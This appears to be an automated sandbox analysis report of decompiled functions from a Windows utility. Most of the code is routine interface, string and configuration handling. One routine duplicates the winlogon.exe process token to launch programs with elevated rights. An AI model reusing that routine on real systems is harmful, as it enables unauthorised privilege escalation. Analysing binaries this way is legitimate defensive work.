GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
strlen.MSVCRT ref: 00409CE4
strlen.MSVCRT ref: 00409CF1

Strings

ntdll.dll, xrefs: 00409CB3
LdrGetProcedureAddress, xrefs: 00409CBA
GetProcAddress, xrefs: 00409C98, 00409C9D
kernel32.dll, xrefs: 00409C8B

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProcstrlen
String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
API String ID: 1027343248-2054640941
Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040289F, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 25
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040289F(intOrPtr* __esi) {
				void* _t9;
				struct HINSTANCE__* _t10;
				_Unknown_base(*)()* _t14;

				if( *(__esi + 0x10) == 0) {
					_t10 = LoadLibraryW(L"advapi32.dll");
					 *(__esi + 0x10) = _t10;
					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
					 *(__esi + 8) = _t14;
					return _t14;
				}
				return _t9;
			}

0x004028a3
0x004028ab
0x004028bd
0x004028ca
0x004028d7
0x004028e3
0x004028e6
0x004028e8
0x00000000
0x004028eb
0x004028ec

APIs

LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6

Strings

advapi32.dll, xrefs: 004028A6
CreateProcessWithTokenW, xrefs: 004028C2
DuplicateTokenEx, xrefs: 004028DB
OpenProcessToken, xrefs: 004028CF
CreateProcessWithLogonW, xrefs: 004028B7

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad
String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
API String ID: 2238633743-1970996977
Opcode ID: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
Instruction ID: fe34eb2af2a63a360b7e1287e200b812ce4d940bd8def4616d2569e5b7a8a532
Opcode Fuzzy Hash: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
Instruction Fuzzy Hash: AEF09874A40708EBCB30EFB59D49B07BAF5FB94710B114F2AE49662690D7B8A004CF14

Uniqueness

Uniqueness Score: -1.00%

Function 004045BA, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 63
registryCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
				void* _v8;
				void _v2054;
				short _v2056;
				void _v4102;
				short _v4104;
				signed int _t28;
				void* _t34;

				E0040B550(0x1004, __ecx);
				_t36 = 0;
				if(E004043F8( &_v8, 0x2001f) == 0) {
					_v2056 = 0;
					memset( &_v2054, 0, 0x7fe);
					_v4104 = 0;
					memset( &_v4102, 0, 0x7fe);
					_t34 = __ebx + 0x20a;
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s\\command");
					_push(0x3ff);
					_push( &_v2056);
					L0040B1EC();
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v4104);
					L0040B1EC();
					RegDeleteKeyW(_v8,  &_v2056);
					_t28 = RegDeleteKeyW(_v8,  &_v4104);
					asm("sbb esi, esi");
					_t36 =  ~_t28 + 1;
					RegCloseKey(_v8);
				}
				return _t36;
			}

APIs

memset.MSVCRT ref: 004045F6
memset.MSVCRT ref: 0040460B
_snwprintf.MSVCRT ref: 0040462A
_snwprintf.MSVCRT ref: 0040463E
RegDeleteKeyW.ADVAPI32(?,?), ref: 00404656
RegDeleteKeyW.ADVAPI32(?,?), ref: 00404662
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,0002001F,?,?,00403904), ref: 0040466E

Strings

%s\shell\%s, xrefs: 00404631
%s\shell\%s\command, xrefs: 00404618

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Delete_snwprintfmemset$Close
String ID: %s\shell\%s$%s\shell\%s\command
API String ID: 1018939227-3575174989
Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED

Uniqueness

Uniqueness Score: -1.00%

Function 0040313D, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52
libraryloaderwindowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040313D(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryW(L"comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}

APIs

LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
#17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD

Strings

Error: Cannot load the common control classes., xrefs: 004031A7
Error, xrefs: 004031A2
comctl32.dll, xrefs: 00403145
InitCommonControlsEx, xrefs: 00403168

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressFreeLoadMessageProc
String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
API String ID: 2780580303-317687271
Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C

Uniqueness

Uniqueness Score: -1.00%

Function 00404DA9, Relevance: 15.1, APIs: 10, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				int _t50;
				long _t61;
				struct HDC__* _t63;
				intOrPtr _t65;
				intOrPtr _t68;
				struct HWND__* _t71;
				intOrPtr _t72;
				void* _t73;
				int _t74;
				int _t80;
				int _t83;

				_t73 = __edx;
				_v8 = 0;
				_v12 = 0;
				_t74 = GetSystemMetrics(0x11);
				_t80 = GetSystemMetrics(0x10);
				if(_t74 == 0 || _t80 == 0) {
					_t63 = GetDC(0);
					_t80 = GetDeviceCaps(_t63, 8);
					_t74 = GetDeviceCaps(_t63, 0xa);
					ReleaseDC(0, _t63);
				}
				GetWindowRect(_a4,  &_v44);
				if((_a8 & 0x00000004) != 0) {
					_t71 = GetParent(_a4);
					if(_t71 != 0) {
						_v28.left = _v28.left & 0x00000000;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						GetWindowRect(_t71,  &_v28);
						_t61 = _v28.left;
						_t72 = _v28.top;
						_t80 = _v28.right - _t61 + 1;
						_t74 = _v28.bottom - _t72 + 1;
						_v8 = _t61;
						_v12 = _t72;
					}
				}
				_t65 = _v44.right;
				if((_a8 & 0x00000001) == 0) {
					asm("cdq");
					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
				} else {
					_t83 = 0;
				}
				_t68 = _v44.bottom;
				if((_a8 & 0x00000002) != 0) {
					L11:
					_t50 = 0;
					goto L12;
				} else {
					asm("cdq");
					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
					if(_t50 >= 0) {
						L12:
						if(_t83 < 0) {
							_t83 = 0;
						}
						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
					}
					goto L11;
				}
			}

APIs

GetSystemMetrics.USER32 ref: 00404DC2
GetSystemMetrics.USER32 ref: 00404DC8
GetDC.USER32(00000000), ref: 00404DD5
GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
ReleaseDC.USER32 ref: 00404DF4
GetWindowRect.USER32 ref: 00404E07
GetParent.USER32(?), ref: 00404E12
GetWindowRect.USER32 ref: 00404E2F
MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
String ID:
API String ID: 2163313125-0
Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94

Uniqueness

Uniqueness Score: -1.00%

Function 00406398, Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00406398(void* __eflags, wchar_t* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E00404AAA(_a4);
				if(_t3 != 0) {
					wcscpy(0x40fb90, _a4);
					wcscpy(0x40fda0, L"general");
					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
					asm("sbb eax, eax");
					 *0x40fe28 =  ~(_t6 - 1) + 1;
					E00405F14(0x40fe30, L"charset", 0x3f);
					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
				}
				return _t3;
			}

0x0040639c
0x004063a4
0x004063b2
0x004063c2
0x004063d3
0x004063dc
0x004063eb
0x004063f0
0x00406401
0x00000000
0x0040641e
0x0040641f

APIs

Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE

wcscpy.MSVCRT ref: 004063B2
wcscpy.MSVCRT ref: 004063C2
GetPrivateProfileIntW.KERNEL32 ref: 004063D3

Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32 ref: 00405F30

Strings

TranslatorURL, xrefs: 0040640B
general, xrefs: 004063B7
TranslatorName, xrefs: 004063F7
rtl, xrefs: 004063CD
charset, xrefs: 004063E1

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfilewcscpy$AttributesFileString
String ID: TranslatorName$TranslatorURL$charset$general$rtl
API String ID: 3176057301-2039793938
Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADF1, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E0040ADF1(signed short* __eax, void* __ecx) {
				void* _t2;
				signed short* _t3;
				void* _t7;
				void* _t8;
				void* _t10;

				_t3 = __eax;
				_t8 = __ecx;
				_t7 = 8;
				while(1) {
					_t2 =  *_t3 & 0x0000ffff;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t7);
					_push(L"&lt;");
					L14:
					_t2 = memcpy(_t8, ??, ??);
					_t10 = _t10 + 0xc;
					_t8 = _t8 + _t7;
					L16:
					if( *_t3 != 0) {
						_t3 =  &(_t3[1]);
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if((_t2 & 0x0000ffff) != 0xffffffb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t8 = _t2;
										_t8 = _t8 + 2;
									} else {
										_push(_t7);
										_push(L"<br>");
										goto L14;
									}
								} else {
									_push(0xa);
									_push(L"&amp;");
									goto L11;
								}
							} else {
								_push(0xa);
								_push(L"&deg;");
								L11:
								_t2 = memcpy(_t8, ??, ??);
								_t10 = _t10 + 0xc;
								_t8 = _t8 + 0xa;
							}
						} else {
							_t2 = memcpy(_t8, L"&quot;", 0xc);
							_t10 = _t10 + 0xc;
							_t8 = _t8 + 0xc;
						}
					} else {
						_push(_t7);
						_push(L"&gt;");
						goto L14;
					}
					goto L16;
				}
			}

APIs

memcpy.MSVCRT ref: 0040AE28
memcpy.MSVCRT ref: 0040AE54
memcpy.MSVCRT ref: 0040AE6E

Strings

&, xrefs: 0040AE4E
<, xrefs: 0040AE05
<br>, xrefs: 0040AE68
", xrefs: 0040AE22
>, xrefs: 0040AE13
°, xrefs: 0040AE3F

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy
String ID: &$°$>$<$"$<br>
API String ID: 3510742995-3273207271
Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF

Uniqueness

Uniqueness Score: -1.00%

Function 004041EB, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr* _v12;
				void _v534;
				short _v536;
				void* __ebx;
				void* __edi;
				intOrPtr _t42;
				intOrPtr* _t95;
				RECT* _t96;

				_t95 = __ecx;
				_v12 = __ecx;
				if(_a4 == 0x233) {
					_v536 = 0;
					memset( &_v534, 0, 0x208);
					DragQueryFileW(_a8, 0,  &_v536, 0x104);
					DragFinish(_a8);
					 *((intOrPtr*)( *_t95 + 4))(0);
					E00404923(0x104, _t95 + 0x1680,  &_v536);
					 *((intOrPtr*)( *_v12 + 4))(1);
					_t95 = _v12;
				}
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t42 = _a12;
							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
						}
					} else {
						E00402EC8(_t95 + 0x40);
					}
				} else {
					_v8 = BeginDeferWindowPos(0xd);
					_t96 = _t95 + 0x40;
					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t96 + 0x10), _t96, 1);
					_t95 = _v12;
				}
				return E00402CED(_t95, _a4, _a8, _a12);
			}

APIs

memset.MSVCRT ref: 0040421E
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
DragFinish.SHELL32(?), ref: 0040423F

Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940

Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4

BeginDeferWindowPos.USER32 ref: 0040427D
EndDeferWindowPos.USER32(?), ref: 004043A4
InvalidateRect.USER32(?,?,00000001), ref: 004043AF

Strings

$, xrefs: 004043CA

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
String ID: $
API String ID: 2142561256-3993045852
Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4

Uniqueness

Uniqueness Score: -1.00%

Function 00405B81, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00405B81(signed short __ebx) {
				signed int _t21;
				void* _t22;
				struct HINSTANCE__* _t25;
				signed int _t27;
				void* _t35;
				signed short _t39;
				signed int _t40;
				void* _t57;
				int _t61;
				void* _t62;
				int _t71;

				_t39 = __ebx;
				if( *0x41c470 == 0) {
					E00405ADF();
				}
				_t40 =  *0x41c468;
				_t21 = 0;
				if(_t40 <= 0) {
					L5:
					_t57 = 0;
				} else {
					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
						_t21 = _t21 + 1;
						if(_t21 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
				}
				L6:
				if(_t57 != 0) {
					L21:
					_t22 = _t57;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x40fb90 == 0) {
							_push( *0x41c478 - 1);
							_push( *0x41c45c);
							_push(_t39);
							_t25 = E00405CE7();
							goto L15;
						} else {
							wcscpy(0x40fda0, L"strings");
							_t35 = E00405EDD(_t39,  *0x41c45c);
							_t62 = _t62 + 0x10;
							if(_t35 == 0) {
								L13:
								_t25 = GetModuleHandleW(0);
								_push( *0x41c478 - 1);
								_push( *0x41c45c);
								_push(_t39);
								goto L15;
							} else {
								_t61 = wcslen( *0x41c45c);
								if(_t61 == 0) {
									goto L13;
								}
							}
						}
					} else {
						_t25 = GetModuleHandleW(_t57);
						_push( *0x41c478 - 1);
						_push( *0x41c45c);
						_push(_t39 & 0x0000ffff);
						L15:
						_t61 = LoadStringW(_t25, ??, ??, ??);
						_t71 = _t61;
					}
					if(_t71 <= 0) {
						L20:
						_t22 = 0x40c4e8;
					} else {
						_t27 =  *0x41c46c;
						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
							goto L20;
						} else {
							_t57 =  *0x41c458 + _t27 * 2;
							_t14 = _t61 + 2; // 0x2
							memcpy(_t57,  *0x41c45c, _t61 + _t14);
							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
							 *0x41c468 =  *0x41c468 + 1;
							 *0x41c46c =  *0x41c46c + _t61 + 1;
							if(_t57 != 0) {
								goto L21;
							} else {
								goto L20;
							}
						}
					}
				}
				return _t22;
			}

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
wcscpy.MSVCRT ref: 00405C02

Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE

wcslen.MSVCRT ref: 00405C20
GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
memcpy.MSVCRT ref: 00405C99

Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73

Strings

strings, xrefs: 00405BF8

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
String ID: strings
API String ID: 3166385802-3030018805
Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C

Uniqueness

Uniqueness Score: -1.00%

Function 00401E44, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
				char _v8;
				void* _v12;
				void* __esi;
				void* _t18;
				intOrPtr* _t22;
				void* _t23;
				void* _t28;
				int _t37;
				intOrPtr* _t39;
				intOrPtr* _t40;

				_v8 = 0;
				_t18 = OpenProcess(0x2000000, 0, _a8);
				_v12 = _t18;
				if(_t18 == 0) {
					_t37 = GetLastError();
				} else {
					_t39 = _a4 + 0x800;
					_a8 = 0;
					E0040289F(_t39);
					_t22 =  *((intOrPtr*)(_t39 + 4));
					if(_t22 == 0) {
						_t23 = 0;
					} else {
						_t23 =  *_t22(_v12, 2,  &_a8);
					}
					if(_t23 == 0) {
						_t37 = GetLastError();
					} else {
						_a4 = _a8;
						E0040289F(_t39);
						_t40 =  *((intOrPtr*)(_t39 + 8));
						if(_t40 == 0) {
							_t28 = 0;
						} else {
							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
						}
						if(_t28 == 0) {
							_t37 = GetLastError();
						} else {
							 *_a12 = _v8;
							_t37 = 0;
						}
						CloseHandle(_a8);
					}
					CloseHandle(_v12);
				}
				return _t37;
			}

APIs

OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3

Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
